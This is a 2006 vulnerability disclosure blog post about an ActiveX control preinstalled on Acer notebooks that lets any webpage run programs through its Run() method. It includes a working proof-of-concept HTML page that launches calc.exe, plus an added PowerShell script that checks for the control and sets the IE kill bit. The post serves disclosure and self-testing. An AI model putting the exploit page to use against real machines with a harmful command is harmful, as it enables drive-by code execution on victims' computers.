by Tan Chew Keong
Date Posted: 2006-11-19
What's Up?
Recently, I noticed that my Acer TravelMate 4150 notebook contains the LunchApp.APlunch ActiveX control,
which is marked as "safe for scripting" and "safe for initializing from persistent data".
A quick check reveals that the control is part of the suite of applications that are distributed by default
in Acer notebooks. And it is pretty old, dating back to November 1998.
Oh well.... what is this ActiveX
control doing on my notebook? And most importantly, what does it allow others to do to my notebook...
Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports
parameters "Drive", "FileName", and "CmdLine". Isn't it
strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?
[
  uuid(D9998BCF-7957-11D2-8FED-00606730D3AA),
  version(1.0),
  hidden,
  dual,
  nonextensible
]
dispinterface _APlunch {
    properties:
    methods:
        [id(0x60030000)]
        void Run(
            [in, out] BSTR* Drive,
            [in, out] BSTR* FileName,
            [in, out] BSTR* CmdLine);
};
It isn't long before I'm using this control from a webpage to execute arbitrary commands on my notebook
when the page is loaded in IE6. And it's too simple....
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
The last parameter of the Run() method allows command-line arguments to be passed to the executable.
The next thing is to find out whether this control exists in other Acer notebooks, especially the newer ones.
I was able to get hold of an Acer Aspire 5600, and truly, the control exists and it is also marked as
"safe for scripting" and "safe for initializing from persistent data".
Luckily, the Acer Aspire 5600 notebook has already been updated to IE7. This prevents silent execution of
the ActiveX control when the page is loaded, unlike IE6 on my Acer TravelMate 4150. However, once the user allows
the ActiveX control to run, abuse of the "Run()" method would be possible.
An advisory was not issued as I've not extensively tested this on other Acer notebooks (e.g. those that
are being sold outside of Singapore). However, both Acer notebooks that I've tested have
"safe for scripting" and "safe for initializing from persistent data" enabled for this control.
You can use the test page below to check whether your Acer notebook is affected.
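As an added example (not part of the original post), the following PowerShell script checks the control's registration on a Windows machine: whether the CLSID from the page is registered, whether it advertises the "safe for scripting" and "safe for initializing" component categories, and whether the IE kill bit is already set for it; with the -SetKillBit switch it sets that kill bit so IE refuses to instantiate the control. The script name, the -SetKillBit switch and the output wording are assumptions of this example; the CLSID comes from the page and the category and kill-bit registry locations are the documented Windows ones.

```powershell
# Added example, not code from the original post. Run in an elevated PowerShell.
# -SetKillBit is a switch of this script, not a Windows option.
param([switch]$SetKillBit)

$clsid            = '{D9998BD0-7957-11D2-8FED-00606730D3AA}'   # CLSID used by the post's <object> tag
$catSafeScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'   # CATID_SafeForScripting
$catSafeInit      = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'   # CATID_SafeForInitializing

$clsidKey = "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid"
if (-not (Test-Path $clsidKey)) {
    Write-Output "Control $clsid is not registered on this system."
    return
}
$server = (Get-ItemProperty "$clsidKey\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
Write-Output "Registered: $clsid -> $server"

# Component categories are one way a control declares itself safe. A control can
# instead answer IObjectSafety at run time, which this registry check cannot see,
# so a missing category does not prove the control is unsafe-marked.
foreach ($cat in @($catSafeScripting, $catSafeInit)) {
    $present = Test-Path "$clsidKey\Implemented Categories\$cat"
    Write-Output ("  Implemented category {0}: {1}" -f $cat, $present)
}

# The kill bit: 'Compatibility Flags' = 0x400 under ActiveX Compatibility\{CLSID}
# makes IE refuse to load the control no matter what safety it claims.
$compatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
$flags = (Get-ItemProperty $compatKey -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
$killBitSet = ($null -ne $flags) -and (($flags -band 0x400) -ne 0)
Write-Output "  Kill bit set: $killBitSet"

if ($SetKillBit -and -not $killBitSet) {
    New-Item -Path $compatKey -Force | Out-Null
    Set-ItemProperty -Path $compatKey -Name 'Compatibility Flags' -Value 0x400 -Type DWord
    Write-Output "  Kill bit set for $clsid; restart IE for it to take effect."
}
```

On 64-bit Windows a 32-bit control and 32-bit IE keep their keys under the Wow6432Node branches as well, so a complete check repeats the same lookups there.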
Tested Systems
- Acer TravelMate 4150
- Acer Aspire 5600
Both were purchased in Singapore.
Test Page
Use this test page that I have created to test whether it is possible to use the LunchApp.APlunch ActiveX
control to run commands on your Acer notebook.
Don't worry, this only runs the harmless calc.exe (calculator).
The test assumes that you have the calculator installed at c:\windows\system32\calc.exe, and you must use
Internet Explorer (IE).
Disclaimer: I'm not responsible for
any harm that might be caused either directly or indirectly on your system as a result of using/visiting
the test page. This page is provided for testing purposes only. By using the test page, you explicitly acknowledge that
you are aware and give explicit permission for the LunchApp.APlunch ActiveX control (D9998BD0-7957-11D2-8FED-00606730D3AA)
to be used to run c:\windows\system32\calc.exe on your system, in order to test your system for the possibility that this
control can be abused.
To create the test page, copy the following into an HTML file, and either host it on a web server or open it
directly using IE.
<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</body>
</html>
Change Log
2006-11-19 - Public Release.